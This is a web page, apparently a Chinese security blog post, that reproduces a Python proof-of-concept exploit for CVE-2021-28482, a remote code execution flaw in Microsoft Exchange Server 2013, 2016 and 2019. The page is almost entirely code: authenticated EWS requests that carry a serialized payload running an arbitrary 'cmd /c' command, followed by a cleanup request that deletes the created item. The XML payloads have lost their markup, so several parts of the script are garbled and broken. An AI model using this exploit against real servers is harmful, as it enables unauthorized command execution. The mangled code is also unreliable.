Microsoft Exchange Server远程执行代码漏洞（CVE-2021-28482）

# Microsoft Exchange Server远程执行代码漏洞（CVE-2021-28482）

影响版本

* Microsoft Exchange Server版本
* 2013
* 2016
* 2019

PoC.py:

“`py
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

target = “”
username = “john”
pwd = “”
cmd = “mspaint.exe”

def escape(_str):
_str = _str.replace(“&”, “&”)
_str = _str.replace(“<", "<") _str = _str.replace(">“, “>”)
_str = _str.replace(“\””, “"”)
return _str

payload2 = “””


ahihi




asdasdasdasdasd





<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/>


Start

cmd
/c %s









Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35
Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters


“”” % escape(
cmd)
payload2 = escape(payload2)
payload1 = “””













Dlt/1
P0DT2H0M0.0S
4
Sunday
1


Std
P0DT2H0M0.0S
10
Sunday
-1




Dlt/2007
P0DT2H0M0.0S
3
Sunday
2


Std
P0DT2H0M0.0S
11
Sunday
1





0


1
2007-01-01T08:00:00.000Z









Weekly Update Meeting


%s

Come hear about how the Organized Observational Paradigm SkyNet project is coming along!
30
2021-04-22T06:45:32.868-08:00
2021-04-22T06:55:32.868-08:00
Contoso Main Gallery



Administrator@evil.corp




john@evil.corp




mart@evil.corp





1


2021-04-22T06:45:32.868-08:00
2







“”” % payload2

res = requests.post(“https://%s/ews/Exchange.asmx” % target,
data=payload1,
headers={
“Content-type”: “text/xml; charset=utf-8”,
},
verify=False,
auth=HttpNtlmAuth(‘%s’ % (username), pwd))

if res.status_code != 200:
print(“error 1”)
exit()
ct = res.content
item_id = ct.split(‘














“”” % (item_id, change_key)

res = requests.post(“https://%s/ews/Exchange.asmx” % target,
data=req_del,
headers={
“Content-type”: “text/xml; charset=utf-8”,
},
verify=False,
auth=HttpNtlmAuth(‘%s’ % (username), pwd))
“`

ref:

* https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda
* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28482